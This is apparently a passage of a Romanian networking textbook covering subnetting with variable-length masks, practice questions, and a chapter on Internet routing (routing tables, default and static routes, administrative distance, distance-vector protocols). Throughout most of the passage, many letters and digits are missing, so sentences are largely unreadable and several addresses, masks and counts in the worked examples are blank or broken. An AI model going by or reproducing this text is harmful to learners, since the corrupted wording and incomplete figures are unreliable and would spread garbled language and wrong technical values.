În cazul nostru, 23= şi este ai a e de ât , aşada , pe t u a ea su eţele su t
e esa i iţi. A eşti t ei iţi de su eţea se o adăuga î o ti ua ea ăştii de eţea a
spaţiului e u ează a fi î pă ţit, fo â d oua as ă de eţea pe t u oile su eţele. Mas a
de eţea pe t u o lasă C este / , adi ă este fo ată di p i ii de iţi o se uti i;
adăugâ d î o ti ua ea a esto a î ă t ei, o ţi e as a / 5.255.255.224).
210 . 89 . 32 . 0 0 0 0 0 0 0 0
24 de biţi 3 biţi 5 biţi

reţea subreţea staţie
Cele su eţele e pot fi defi ite su t ide tifi ate p i iţii de su eţea:
210. 89. 32. 000 00000 /27 – prima subreţea
210. 89. 32. 001 00000 /27 – a doua subreţea
[...]
Nu ă ul de iţi ă aşi dispo i ili pe t u â pul de staţie este – . Î sea ă
ă pute a ea âte 5-2 = 32- = de ad ese de staţie î fie a e su eţea. A est lu u u
corespu de î să u e i ţele p o le ei: eţeaua di ă i t e uie să o ţi ă de staţii.
Pe t u a satisfa e e i ţele i puse de p o le ă t e uie folosite ăşti de eţea u

lu gi e a ia ilă.
“e ia eţeaua u el ai a e u ă de staţii e esa , î azul de faţă, eţeaua di ă i , u

de staţii, şi se a de ide âţi iţi su t e esa i pe t u a defi i de ad ese de staţie. Cu
u pute utiliza ad esa de eţea ea î a e toţi iţii de staţie su t şi i i ad esa de difuza e
ea î a e toţi iţii de staţie su t , t e uie găsită ea ai i ă pute e a lui e ge e ează
u u ă u el puţi doi ai a e de ât u ă ul e esa . Î azul de faţă, 6-2 = 64 – 2 = 62
şi este ai a e de ât , eea e î sea ă ă su t e esa i iţi pe t u asigu a ea
spaţiului de ad ese pe t u eţeaua di ă i . P i folosi ea a iţi di ei dispo i ili, ezultă
ă pe t u a defi i su eţeaua e ai ă â iţi, adi ă p efi ul oi su eţele a fi / . Ad esa
de eţea pe t u eţeaua di ă i este . . . / , adi ă . . . / .
Au ai ă as de defi it eţelele pe t u la o atoa e, e eta e şi se eta iat. Nu ă ul

el ai a e de staţii este el pe t u eţelele di la o ato , de staţii. Vo p o eda la fel a
5
ai sus, alegâ d u ă ul de iţi e esa pe t u defi i ea ad eselo de staţii. A esta este -
= şi > . Pe t u eţeaua di ă i a folosit u a di t e ele eţele / pe a e le-
a eat. Pute î pă ţi o eţea / î două eţele / p i e ti de ea ăştii de eţea u u
bit. “p e e e plu, a t eia eţea / eată: . . . / , adi ă . . . /
are 32- = iţi dispo i ili ea ope iţi de as a de eţea . A eşti iţi pot fi î pă ţiţi la
â dul lo aşa u a fă ut u spaţiul i iţial î iţi de eţea şi iţi de staţie. Cu oi a e
e oie de iţi pe t u staţii î t -o eţea de la o ato , ai ă â e u it pe t u su eţea. Cu
u it pute defi i două eţele 1, deoarece cu un bit putem reprezenta 2 valori). În
p o le a oast ă, e a t de două eţele a âte de al ulatoa e este e oie. Aşada ,
î pă ţi a t eia eţea / î eţele / şi o ţi e ele două eţele pe t u la o atoa e:
210.89.32.10000000 /26 = 210.89.32.128 /26
210.89.32.10100000 /26 = 210.89.32.160 /26
‘eţeaua pe t u depa ta e tul de e eta e a o ţi e staţii, ia ea pe t u
se eta iat . Cea ai i ă pute e a lui a e ge e ează u u ă ai a e u el puţi
de ât este . La fel şi pe t u . Î sea ă ă ai a e de eat eţele u âte iţi pe t u
defini ea ad eselo de staţie.
Cea de-a pat a eţea / : . . . , adi ă . . . ae iţi
dispo i ili. Cu a eşti iţi t e uie să eă eţele u a i staţii. Pute alege să folosi
u si gu it pe t u a e ti de as a de eţea şi o o ţi e eţele ia u ei iţi ă aşi
putem defini câte 25 – = de ad ese de staţie; sau, pute alege să e ti de u iţi as a
de eţea, pe t u a fo a su eţele a âte staţii. Î p i ul az ă â ad ese de staţie
nefolosite, în al doilea caz ă â su eţele dispo i ile pe t u alte utiliză i. Deşi p o le a u
spe ifi ă i i u fel de o st â ge i î a est se s, o alege să folosi iţi pe t u su eţea,
adi ă să î pă ţi eţeaua / î pat u su eţele / şi să folosi di t e ele pe t u
depa ta e tul de e eta e şi se eta iat. Pe t u depa ta e tul de e eta e alege a -a
su eţea di ele eate ia pe t u se eta iat pe a -a. Ad esele elo două eţele o fi:
210.89.32.11010000 /28 = 210.89.32.208 /28 – Reţeaua cercetare
210.89.32.11100000 /28 = 210.89.32.224 /28 – Reţeaua secretariat
3. În realitate, se poate aloca gateway-ului o i e ad esă alidă de staţie, e istă î să o o e ţie

de a e i e să ţi e o t. P i o e ţie, pe t u gateway se foloseşte p i a ad esă alidă
de staţie, adi ă, î azul eţelei di ă i , ep eze ta ea i a ă a lui pe iţi i i de
u aţi de u .
Adresa gateway-ului pe t u eţeaua di ă i :
210.89.32.01000001 /26 = 210.89.32.65 /26
4. Ad esa de eţea pe t u eţeaua desti ată depa ta e tului de cercetare este:

210.89.32.208 /28 = 210.89.32.11010000 /28
Ad esa de difuza e este ea a e a e toţi iţii de staţie su t :
210.89.32.11011111 /28 adică 210.89.32.223 /28
130 | ‘ e ţ e l e L o a l e
5. Ad esa eţelei utilizate de ăt e se eta iat este

210.89.32.224 /28 = 210.89.32.11100000 /28
Cu ei pat u iţi di zo a de staţie pute defi i ad ese. Î t u ât u pute folosi ad esa de
eţea şi i i ad esa de oad ast, ezultă ă ă â ad ese alide pe t u staţii. A estea su t:
210.89.32.11100001 /28 – prima adresă de staţie
[...]
210.89.32.11101110 /28 – ultima adresă de staţie
Cu alte u i te, ad esele alo a ile staţiilo pe t u se eta iat su t ele up i se î i te alul
de adrese 210.89.32.225 – 210.89.32.238
6. Co side ă ă p i ul la o ato este el u ad esa de eţea . . . / .

Cea de-a 5-a ad esă de staţie este:
210. 89. 32.10000101 /26, adică 210.89.32.133 /26
Î tre ări
1. Ca e di t e ad esele de ai jos ep ezi tă o ad esă alidă de staţie:
 150.100.2.8/25
 177.1.1.192/26
 195.3.15.8/22
 200.1.1.63/27
2. Ca e di t e ad esele de ai jos poate fi o ad esă de eţea pe t u p efi ul / ?

 209.110.19.64
 230.14.3.0
 120.4.77.196
 89.13.13.26
3. Fie o eţea lo ală u u s it h, staţii şi u oute pe t u o e ta ea la I te et.

Ca e este u ă ul a i de i t ă i î ta ela A‘P a u ei staţii?
 2
 3
 4
 mai mare de 4
4. Din reteaua 192.64.12.0 /24 putem crea:

 a) 62 de subretele a cate 2 statii?
 b) 6 subretele a cate 30 de statii?
 c) 8 subretele a cate 32 de statii?
 d) 16 subretele cu cate 16 statii?
 e) 14 subretele cu cate 14 statii?
5. Care dintre urmatoarele adrese IP sunt rutabile?

 a) 142.2.16.79 /28
 b) 150.12.180.40 / 29
 c) 19.0.27.0 /20
6. Pentru adresa IP 196.36.44.12 /22

 a) scrieti adresa de retea si adresa de broadcast
 b) care este prima si ultima adresa asignabila din retea?
 c) care este adresa urmatoarei retele?
7. Pentru adresa IP 196.36.44.12

 a) identificati clasa de adrese din care face parte
 b) scrieti adresa de retea si adresa de broadcast
 c) care este prima si ultima adresa asignabila din retea?
 d) care este adresa urmatoarei retele?
8. Fie spaţiul de ad ese . . . / . Da ă t e uie î pă ţit î su eţele, a e a

fi adresa celei de-a 29-a staţii di ea de-a 5-a su eţea?
132 | ‘ e ţ e l e L o a l e
4 Rutarea în Internet
If ou asked a hu d ed people alki g do the st eet...I ould et you that 90 of them, if not
of the , ould ask, 'What's a oute ?'
Stewart Wolpin

 Ce este o ta elă de uta e
 Tipuri de rute folosite pentru rutarea traficului
 Protocoale de rutare
 Dife e ţe între protocoalele de rutare şi p oto oalele utate
 Tipuri de protocoale de rutare
 Co figu a ea ută ii î Li u
 Co figu a ea ută ii î Wi do s
Cine este...
Len Bosack și Sandy Lerner sunt co-fo dato Cis o “ ste s. Bosa k și Le e su t
creatorii primului router multi-protocol, dispozitiv care s-a dovedit un succes comercial.
Î , Bosa k și Le e au pă ăsit Cis o și au â dut a ţiu ile pe t u o aloa e
esti ată de de ilioa e de dola i.
4.1 Protocoale de rutare şi protocoale rutate

4.1.1 Ce este Internetul?
Deşi I te etul este u te e î tâl it la tot pasul î do e iul al ulatoa elo , defi iţia sa
u este foa te la ă.
Ce este Internetul?
U ăspu s f e e t spu e ă I te etul este a sa lul tutu o eţelelo i te o e tate.
P o le a u a eastă defi iţie este ă este o defi iţie des ipti ă şi, deşi ade ă ată î ele di
u ă, este î a e pa te i ele a tă.
Da ă u al ulato ou este o e tat la u alt al ulato , a fi oul al ulato pa te di I te et?
Da ă oul al ulato a e o pla ă de eţea, atu i a a ea şi ad esă MAC, si gu a p o le ă
fii d a eea de a fa e ost şi de a at i ui al ulato ului o ad esă IP. O alitate i po ta tă a
I te etului o stă î apa itatea al ulatoa elo de a fi „TCP/IP compliant , adi ă de a ula
sti a de p oto oale TCP/IP şi de a poseda o ad esă IP.
Internetul poate fi defi it ai p e is a a sa lul glo al al tutu o eţelelo
i te o e tate e su t TCP/IP o plia t .
După u s-a p e izat, pe t u a o e ta două al ulatoa e este e oie de di e se
dispozitive de interconectare. Un astfel de dispozitiv este routerul. Routerul fa e posi ilă
s ala ilitatea I te etului, şi astfel hia e iste ţa sa. P i u a e, o i e defi iţie ele a tă a
I te etului t e uie să po eas ă ai deg a ă de la routere de ât de la staţii.
Odată u dispoziti ele de i te o e ta e apa şi u e oase p oto oale. P i it di pu tul
de ede e al fu ţio ă ii sale, I te etul este defi it de si ioza a două tipu i de p oto oale
de i el eţea: p oto oale de uta e şi p oto oale utate.
Protocoalele de rutare sunt cele ce stabiles egulile p i a e i fo aţiile desp e eţele
sunt schimbate între routere î s opul o ţi e ii u ei ta ele de uta e ade ate topologiei.
133 | R u t a r e a î n I n t e r n e t
Protocoalele rutate sunt acele protocoale responsabile pentru asigurarea unui mod de
ide tifi a e a e tităţilo e pa ti ipă î I te et p i sta ili ea u ei s he e de ad esa e e
t e uie să asigu e u i itatea şi ie a hiza ea ad eselo .
4.1.2 Tabele de rutare

Î apitolul Ethe et au fost p eze tate ta elele de o uta e p e u şi p o esul de
decizie pentru switchuri. Tabela de o uta e este o listă de eguli, fie a e up i zâ d o pa te
de identificare (matching şi u a de a ţiu e, î speţă i te faţa de ieşi e di s it h po tul . Î
pa tea de ide tifi a e se află o ad esă MAC desti aţie, ia î pa tea de a ţiu e este p e izată
u a di i te feţele s it hului.
Dato ită di e siu ii ult ai a i a I te etului a est od de de izie a t e uit afi at î
două di e ţii: alege ea u ei s he e de ad esa e ie a hi e, pe de o pa te, şi i ple e ta ea
u o algo it i ât ai pe fo a ţi de ăuta e şi i pli it de sto a e a i fo aţiilo , pe de altă
parte.
Î eea e p i eşte p i a di e ţie, deşi a e o â stă e e a ilă, IP ofe ă o s he ă de
ad esa e satisfă ătoa e, deşi puţi fle i ilă. P i u a e, IP a t e ui să ofe e ulte alte
ava taje pe lâ gă e ti de ea lu gi ii ad esei de la la de iţi, pe t u a euşi să se
i pu ă d ept î lo uito ul lui IP . Cea de-a doua di e ţie este î depli ită u ajuto ul u o
algo it i de a hi g spe ifi i dispoziti ului de uta e şi siste ului de operare asociat.
Similar cu switchul, routerul foloseşte o ta elă de uta e pe t u di ija ea pa hetelo at e
desti aţie. O i t a e î ta ela de uta e se ai u eşte şi ută.
O rută este o egulă e up i de o pa te de ide tifi a e şi u a de a ţiu e. Pa tea de
ide tifi a e este o pusă di două ele e te: ad esa eţelei desti aţie şi as a a esteia, î
e e e pa tea de a ţiu e poate fi e p i ată p i a ele sau doa u ul di t e u ătoa ele
ele e te: ad esa u ăto ului router u ită e t hop add ess şi i te faţa de ieşi e di router.
O ta elă de rutare este o listă de ute u a es se e ţial.
Î figu a de ai jos este p eze tată o ta elă de uta e. I po ta t de e a at este faptul
ă, deşi folosi ea ta elei de uta e se fa e a alizâ d se e ţial utele începând cu prima,
o st u ţia ta elei se fa e p i i se a ea u ei oi ute î faţa p i ei ute u u p efi ai
s u t de ât a easta. D ept ezultat lu gi ea ăştii de eţea a s ădea odată u pa u ge ea
ta elei de uta e. Altfel spus, i fo aţiile efe itoa e la eţelele i i se o găsi î ai tea
i fo aţiilo desp e eţelele ai a i.
“e ai poate o se a ă pe t u u ele ute este p e izată doa ad esa u ăto ului router,
î e e e pe t u altele doa i te faţa de ieşi e. Deşi ad esa u ăto ului hop este
î totdeau a de aju s pe t u spe ifi a ea o pletă a u ei ute, i fo aţia desp e i te faţa de
ieşi e este i sufi ie tă î azul î a e a eastă i te faţă este o e tată la u ediu ultia es.
Astfel, deşi o ută alidă poate p e iza doa i te faţa de ieşi e î azul u ei legătu i se iale sau
o i e altă legătu ă pu t la pu t , a eeaşi ută este o side ată a iguă î azul u ei legătu i
Ethe et, î a est al doilea az fii d e esa ă p e iza ea ad esei u ăto ului hop.
Adresă reţea Mască Next hop Interfaţă

194.230.85.0 /26 172.17.0.9 E0
194.230.85.128 /26 - S0
194.230.85.0 /24 194.230.5.65 E1
194.230.86.0 /24 199.17.17.0 -
4-1: Ta elă de rutare u patru i trări
134 | ‘ e ţ e l e L o a l e
Pe t u a î ţelege ai uşo odul de decizie a unui router se va p esupu e ă u router cu

o ta elă de uta e ide ti ă u ea p eze tată î figu a de ai sus p i eşte u pa het u
ad esa desti aţie . . . .
Di î t egul pa het si gu a i fo aţie ele a tă pe t u i elul eţea al u ui router este
ad esa logi ă desti aţie. Î p i ul â d, routerul a t e ui să dete i e da ă u este el
destinatarul acestui pachet, iar pentru aceasta va compara adresele logice ale tuturor
i te feţelo sale a ti e u ad esa desti aţie a pa hetului. Da ă este destinatarul pachetului
atunci va trimite datele nivelurilor superioare.
În cazul în care routerul nu are nicio i te faţă a ti ă u a eeaşi ad esă a ea a pa hetului,
routerul a t e e la pasul doi, î e â d să dete i e da ă desti aţia se află î a eeaşi eţea
a şi su sa. Pe t u a easta a a aliza ad esa şi as a i te feţei pe a e a p i it pa hetul î
auză. Astfel a apli a as a aso iată i te feţei de i t a e pe ad esa i te feţei u â d a
ezultatul să fie o pa at u ezultatul ope aţiei de „şi logi î t e a eeaşi as ă de eţea şi
ad esa desti aţie. Da ă ele două ezultate oi id, routerul va ignora pachetul, altfel urmând
să î eapă p o esul efe ti de uta e.
P i a ută di ta ela de uta e a fi e t asă, ia ezultatul ope aţiei de „şi logi între
ad esa desti aţie şi as a de eţea up i să î a eastă ută a fi o pa at u ad esa de eţea.
Î azul î a e ele două alo i oi id, a tetul de i el legătu ă de date al pa hetului a fi
es is a tetul de i el eţea ă â â d es hi at şi pa hetul a fi t i is ăt e u ăto ul
hop. Da ă alo ile dife ă, a fi e t asă u ătoa ea ută pâ ă la găsi ea p i ei pot i i i sau
pâ ă la epuiza ea utelo , az î a e pa hetul u ează să fie ig o at.
În cazul exemplului de faţă, se presupune ă pa hetul u desti aţia . . . t e uie
utat. P i a ută a apli a as a / ad esei desti aţie, ezultâ d . . . , aloa e
dife ită de . . . . Ni i a doua ută u este pot i ită pe t u a eastă desti aţie, astfel
ajungându-se la cea de a treia rută.
Apa e t p i a şi a t eia ută se efe ă la a eeaşi eţea. La o p i i e ai ate tă ăştile de
eţea dife ă, astfel a t eia ută se efe ă la u spaţiu de ad ese de pat u o i ai a e de ât
p i a. Î ealitate, dato ită a a te ului se e ţial al utiliză ii ta elelo de uta e şi a faptului
ă p i ele două ute se efe ă la două sfe tu i di a elaşi spaţiu de ad ese, u ă ul de ad ese
dife ite e o folosi a t eia ută a fi doa du lu şi u de pat u o i ai a e de ât u ă ul
de adrese ce vor folosi p i a ută.
Î u a apli ă ii ăştii / pe t u ad esa desti aţie, ezultă . . . şi a u e ad esa
eţelei desti aţie di a eastă ută. Pe t u a putea t i ite pa hetul a t e ui aflată ad esa MAC
a u ăto ului hop, şi a u e . . . . Î u a i te ogă ii ta elei A‘P sau a u ei e e i
A‘P, ad esa MAC su să este es isă u ad esa MAC a i te feţei E , ia ad esa MAC desti aţie
este î lo uită u ad esa MAC o espu zătoa e u ăto ului hop.
4.1.3 Clasificarea rutelor

E istă u e oase ite ii de lasifi a e a utelo . U ele ite ii p ezi tă o ele a ţă edusă
pentru Internetul secolului 21. Câteva dintre ele vor fi amintite totuşi, deoarece, în anii de
e pa siu e a I te etului, st u tu au î ţelege ea eţelei glo ale.
La î eputul a ilo o ută u o ţi ea as a de eţea, î t egul p o es de uta e fii d
lassfull. Astfel, o p i ă lasifi a e a fi î fu ţie de tipul p o esului de uta e, şi a u e rute
classfull sau rute classless. Odată u t e e ea ti pului şi u eşte ea î popula itate a
ad esă ii lassless ta elele de uta e au de e it lassless hia da ă su t ali e tate u eo i de
p oto oale de uta e lassfull adi ă p oto oale e u t a s it şi i fo aţii desp e as a de
eţea , routerele u â d să p e izeze e pli it as a de eţea î ai te de a i t oduce
i fo aţiile î ta ela de uta e.
Î uta ea u ute lassfull p o esul este dife it, şi a u e ad esa desti aţie e t asă di
antetul unui pachet ajuns la router a fi ai î tâi o pa ată u , şi î azul î a e e ai
i ă de a fi o pa ată u 128, determinându-se astfel lasa de ad ese şi i pli it as a
de eţea. Di a est pu t p o esul este si ila u el di uta ea classless, adi ă se a efe tua
o ope aţie de „şi logi î t e ad esa desti aţie şi as a eţelei, ezultatul u â d a fi
compa at u ad esa de eţea o ţi ută î ută.
Odată u ăspâ di ea ută ii lassless a apă ut lasifi a ea utelo î fu ţie de tipul
desti aţiei. Astfel sunt rute de tip nod (sau rute host) şi rute de tip rețea. Rutele host o ţi
i fo aţii doa desp e o si gu ă staţie, adi ă as a de eţea este / . Odată u eşte ea
I te etului, şi i pli it a di e siu ii ta elelo de uta e, a es ut şi p esiu ea de a ag ega ât
ai ult utele, p e u şi a se e u ţa la utele de tip od. Cu toate a estea, dato ită
modului de i se a e a utelo , şi de i dato ită p o o ă ii utelo de tip od la î eputul ta elei
de rutare, acestea având prefixul maxim, rutele host ai su t î ă folosite pe t u u ele
opti iză i de t afi , ai ales pe routerele de la periferia Internetului.
Al t eilea ite iu de lasifi a e a utelo este î fu ţie de odul de o e ta e, ia ele
două tipu i de ute su t: rutele direct conectate şi rutele gate a ătre rețele dista te .
‘utele di e t o e tate su t ute ăt e eţele î a e routerul în auză a e o i te faţă, şi î
majoritatea cazurilor aceste rute sunt automat introduse în tabela de rutare de sistemul de
ope a e î o e tul o figu ă ii şi a ti ă ii i te feţei espe ti e. ‘utele di e t o e tate u
o ţi , î ge e al, ad esa u ăto ului hop, a â d spe ifi ată doa i te faţa de ieşi e di
router. Astfel, utele di e t o e tate su t si gu ele ute alide a e pot a ea spe ifi ată a
i te faţă de ieşi e o i te faţă ultia ess ge Ethernet , fă ă a e esita p e iza ea ad esei
u ăto ului hop.
O a pat a lasifi a e a utelo se fa e î fu ţie de ediul de a es la eţea, a â d astfel
rute pe medii punct la punct şi rute pe medii multiacces. ‘utele ăt e o eţea o e tată pe o
legătu ă pu t la pu t pot fi spe ifi ate o i p i i te faţa de ieşi e di router, ori prin adresa
u ăto ului hop, o i p i a ele. ‘utele pe edii ultia es su t spe ifi ate doa p i ad esa
u ăto ului hop, i te faţa de ieşi e efii d sufi ie tă.
Din punctul de vedere al unui router, două edii de t a s isie a ope ă a ea ajo itate
a utelo ; altfel spus, două tipu i a u e de i te feţe su t ult ai popula e de ât estul. Cele
două tipu i de i te feţe su t i te feţele Ethe et şi ele se iale. Ethe et pe ite t a s isia
peste un mediu multiacces, în vreme ce inte faţa se ială este pu t la pu t. Alte i te feţe
pu t la pu t destul de ăspâ dite su t ele de fi ă opti ă şi ele I“DN.
U tip spe ial de ută este uta i pli ită.
O ruta i pli ită rută default este ruta spre care se trimit toate pachetele pentru care nu
se u oaşte o desti aţie spe ifi ă.
Altfel spus, uta i pli ită este uta a e se pot i eşte u toate desti aţiile, a â d î pa tea
de ad esă de eţea di ută u spaţiu de ad ese e up i de toate ad esele IP. A est spaţiu de
adrese este 0.0.0.0/0 şi, deşi deseo i uta i pli ită este de u ită a uta u de ze o sau
quad-ze o oute, a a te isti a disti ti ă a a estei ute se află î as a de lu gi e ze o.
E istă situaţii î a e pot e ista ai ulte ute i pli ite î t -o ta elă de uta e. În tabela
de uta e de ai jos, ulti ele două ute su t două ute i pli ite.
Ad esă eţea Mas ă Next hop I te faţă
......
0.0.0.0 /0 194.230.5.65 S0
0.0.0.0 /0 - S1
4-2: Ta elă de rutare u două rute i pli ite
136 | ‘ e ţ e l e L o a l e
Da ă a ele ute apa î ta ela de uta e, este e ide t ă niciun pa het u a aju ge să
fie prelucrat de cea de-a doua ută i pli ită, toate pa hetele fii d a eptate de p i a.
Deza ti a ea u ei i te feţe, a u a e a î hide ii ad i ist ati e sau a întreruperii
legătu ii de i el fizi sau de i el legătu ă de date, a e a ezultat î lătu a ea tutu o utelo
e foloses espe ti a i te faţă a i te faţă de ieşi e di router. Astfel, î a se ţa elei de-a
doua ute i pli ite î azul deza ti ă ii i te feţei “ , toate pa hetele a e a fi fost utate p i
p i a ută i pli ită a u a să fie ig o ate.
În concluzie, într-o ta elă de uta e e istă o si gu ă ută i pli ită a ti ă, da pot fi
precizate mai multe rute default în scopuri de backup.
Ultima clasifi a e este şi ea ai ele a tă î p eze t. Po i d de la i fo aţia pe aza
ă eia su t o st uite utele, disti ge rutele statice de rutele dinamice. A eastă lasifi a e
se efe ă doa la utele gate a , deoa e e utele di e t o e tate su t i t oduse automat în
tabela de rutare.
4.1.4 Rute statice

Rutele statice sunt introduse manual de administratorul routerului, spre deosebire de
utele di a i e a e e esită o figu a ea u ui p oto ol de uta e. O ută stati ă a apă ea î
tabela de rutare numai atunci câ d i te faţa de ieşi e di router este o figu ată o e t şi
a ti ată.
O li ita e a folosi ii utelo stati e este ă s hi ă ile î topologia eţelei t e uie el ai
adesea să fie a tualizate a ual pe router de ad i ist ato . Deşi e istă odalităţi de
mi i iza e a efe tului s hi ă ilo î topologie, a este p o edee du la ă i ea di e siu ii
tabelei de rutare.
Pe de altă pa te, o i e p oto ol de uta e e esită o a u ită lăţi e de a dă pe t u
a tualiza ea ta elelo de uta e. Odată p i ită, i fo aţia de uta e t e uie p elu ată î ai te
de a fi i t odusă î ta ela de uta e, u ele p oto oale de uta e o su â d a tităţi
se ifi ati e de ti p de p o eso sau de e o ie. “p e deose i e de uta ea di a i ă,
uta ea stati ă u a e e i ţe de lăţi e de a dă, ti p de p o eso sau e o ie î afa ă de
e o ia efe ti ă o upată de ta ela de uta e . I t odu e ea a uală de i fo aţii poate
pă ea o etodă a hai ă de ad i ist a e, da , î azul routerelor de la periferia Internetului,
uta ea stati ă este adesea ai pot i ită de ât uta ea di a i ă.
Multe di t e eţelele de i i di e siu i u au o legătu ă edu da tă la I te et, astfel
î ât spe ifi a ea legătu ii de I te et p i t -o ută stati ă sau di a i ă su t la fel de i utile î
cazul întreruperii conexiunii.
Î o luzie, utele stati e u su t o soluţie depăşită de o figu a e a routerelor, iar
iito ul u pa e să a u ţe î lo ui ea ută ii stati e u uta ea di a i ă. ‘uta ea stati ă
o ti uă să fie soluţia opti ă pe t u eţelele u u g ad edus de o plexitate sau pentru
eţelele stub eţele u o si gu ă o e iu e la I te et .
4.2 Protocoale rutate

Protocolul IP, prezentat într-un capitol anterior, este de fapt singurul protocol rutat folosit
î I te et î epâ d u a ii . Cele două p oto oale utate concurente pentru IP sunt
Apple Talk şi IPX. I ple e tă ile soluţiilo de o e ta e peste I te et azate pe a este
p oto oale su t a e, da ele două p oto oale ă â î ă destul de folosite î eţelele lo ale.
Deşi Ma i tosh o upă , % di piaţa o dială de al ulatoa e pe so ale, efo tul pe t u

susţi e ea soluţiilo azate pe Apple Talk î â dul a ilo p odu ăto i de e hipa e te de
eţea s-a diminuat rapid, trecând pe un plan colateral începând cu anii `95.
IPX, î s hi , a fost ultă e e u o petito eduta il pe t u IP. De fapt, o petiţia
di t e sti a de p oto oale TCP/IP şi “PX/IPX s-a t adus î li ajul eţelelo lo ale de
al ulatoa e î o petiţia di t e Mi osoft şi No ell.
O dis uţie a a a tajelo u uia di t e p oto oale faţă de elălalt poate o upa destul spaţiu.
În cele din u ă, ăspu sul la î t e a ea „de e IP, şi u IPX? ţi e ai deg a ă de aţiu i de
a keti g de ât de aţiu i teh i e.
“i gu a o u e ţă eală pe t u p oto olul IP este p oto olul IP , da sla a sa
ăspândire a tuală poate susţi e afi aţia ă e istă, de fapt, un singur protocol rutat în
I te et. Mai ult, ig aţia ăt e IP u a î eput di u leul I te etului pe t u a se
p opaga apoi sp e eţelele lo ale. Î p eze t e istă eţele lo ale IP legate el ai adesea prin
mecanisme de tunelare peste IPv4.
4.3 Protocoale de rutare

4.3.1 Determinarea căii optime
P oto oalele de uta e, u eo i de u ite şi p oto oale de uta e di a i ă, au d ept
o ie ti s hi a ea i fo aţiilo desp e eţelele u os ute î t e routerele ce rulează a elaşi
p oto ol de uta e. Pe aza a esto i fo aţii se o st uies utele di a i e.
Routerele au âte o ta elă de uta e pe t u fie a e p oto ol utat. Pe t u u p oto ol
utat dat i fo aţiile ofe ite de toate p oto oalele de uta e se egăses într-o si gu ă ta elă.
P i u a e, a eeaşi ta elă de uta e a o ţi e utele di e t o e tate, utele stati e şi ele
dinamice.
Un router poate ula u ul sau ai ulte p oto oale de uta e, u ă ul p oto oalelo de
rutare ce pot fi rulate fiind limitat în general de sistemul de operare sau de modelul routerului.
Un router Cis o, de e e plu, ulează î ge e al pâ ă la de i sta ţe de p oto oale de
rutare.
O p o le ă a e apa e este ă a elaşi p oto ol de uta e poate să fu izeze două sau ai
multe rute ăt e a eeaşi desti aţie; pot, de ase e ea, e ista două ute di a i e ăt e a eeaşi
eţea p o e ite di p oto oale de uta e dife ite.
Astfel, deşi e istă t ei tipu i de ute, este e esa ă spe ifi a ea u e a is de
comparare a rutelor între ele. Mai mult, t e uie a toate utele să fie ie a hizate. Cele două
ite ii de ie a hiza e a utelo su t dista ţa ad i ist ati ă şi et i a.
Dista ţa ad i istrativă este u u ă î t e şi , aso iat u u tip de ută sau u u
protocol de rutare, ce permite ierarhizarea protocoalelor de rutare.
Metrica u ei ute este u u ă , ezultat di ap e ie ea alităţii u ui d u sp e o a u ită
desti aţie î apo t u u set de ite ii. Met i a şi setul de ite ii su t ele a te pe t u u
anumit protocol de rutare. Prin urmare, nu are sens compararea metricilor u o ute o ţi ute
prin protocoale de rutare diferite.
Altfel spus, dista ţa ad i ist ati ă deose eşte două p oto oale de uta e, î e e e
et i a deose eşte două ute ale a eluiaşi p oto ol de uta e. ‘utele statice sunt singurele
ute pe t u a e dista ţa ad i ist ati ă poate fi s hi ată.
Dista ţele ad i ist ati e pe t u u ele di t e ele ai folosite p oto oale de uta e su t
precizate în tabelul de mai jos:
138 | ‘ e ţ e l e L o a l e
Dista ţa
Tip ută
ad i ist ati ă
Direct conectată 0
‘ută stati ă 1
‘ută ag egată 5
BGP 20
EIGRP 90
IGRP 100
OSPF 110
IS-IS 115
RIP 120
ODR 160
iBGP 200
4-3: Valorile dista țelor ad i istrati e
4.3.2 Clasificarea protocoalelor de rutare

E istă u e oase lasifi ă i ale p oto oalelo de uta e. Î o ti ua e o fi p eze tate
două di t e a estea.
Î e e e staţiile su t g upate î eţele pe t u a ofe i o ie a hiza e a spaţiului de ad ese,
eţelele su t g upate, la â dul lo , î ole ţii de eţele aflate su o ad i ist aţie o u ă
u ite siste e auto o e A“ . Astfel, o p i ă lasifi a e a p oto oalelo de uta e se fa e î
protocoale de rutare inter-AS, folosite pe t u s hi ul i fo aţiilo de uta e î t e siste e
auto o e dife ite şi protocoale de rutare i ter ă, adi ă p oto oale folosite î ad ul a eluiaşi
sistem autonom.
Cea de-a doua lasifi a e a p oto oalelo de uta e se efe ă doa la lasifi a ea
p oto oalelo de uta e i te ă, î fu ţie de odul de s hi a e a i fo aţiei de uta e. Cele
t ei lase î a e su t î pă ţite p oto oalele de uta e i te ă su t: protocoale bazate pe
e tori de dista ță (distance-vector protocols), protocoale bazate pe starea conexiunii (link-
state protocols şi protocoale hibride.
Cea de a treia categorie de p oto oale de uta e i te ă î i ă a a te isti i ale
p oto oalelo azate pe e to i de dista ţă u u ele a a te isti i ale p oto oalelo azate pe
sta ea o e iu ii. A eastă ouă atego ie este folosită pe t u a lasifi a p oto oalele e u
pot face parte din niciuna di t e p i ele două atego ii, astfel ă, î ele e u ează, o fi
prezentate doar protocoalele distance-vector şi link-state.
4.3.3 Protocoale distance-vector

Pentru protocoalele de tip distance-vector al ulul d u ului opti se fa e pe ază de
di e ţie i di ată de o i ei p i p e iza ea i te feţei şi dista ţa pâ ă la desti aţie folosi d
di e ţia espe ti ă. I fo aţiile de uta e se s hi ă u ai î t e routerele învecinate, la
i te ale pe iodi e. A easta ezultă î t -u ti p de o e ge ţă a e, adi ă s hi ă ile
apă ute î topologia eţelei se p opagă destul de g eu ăt e utele ai î depă tate de lo ul
apa iţiei odifi ă ii î auză.
Cele ai popula e p oto oale de uta e azate pe e to i de dista ţă su t ‘IP 1 şi IG‘P,
a estea fii d uşo de o figu at şi o su â d esu se de lăţi e de a dă şi ti p de p o eso
foarte reduse.
1
‘IP foloseşte d ept et i ă u ă ul de hopu i sau routere pâ ă la eţeaua desti aţie.

Pe t u a se e ita efe tele egati e ale u lelo logi e a fost sta ilită o et i ă a i ă, astfel
î ât o i e i fo aţie desp e o ută u o et i ă ai a e de este ig o ată.
A tualiză ile se fa t a s iţâ d toate i fo aţiile de uta e şi u doa ele e s-au
modificat de la ultima actualizare, dar sunt trimise folosindu-se adrese de difuzare. Prin
urmare, pachetele de actualizare vor ajunge doar la routerele adiacente, deoarece în mod
implicit routerele filt ează pa hetele de broadcast.
A tualiză ile se fa i pli it la de se u de, a est ti p ep eze tâ d u o p o is î t e
timpul de o e ge ţă şi a titatea de a dă utilizată pe t u a tualiză i. Astfel, ti pul de
o e ge ţă la ‘IP î el ai defa o a il az este de i ute ju ătate hopu i , alifi â d
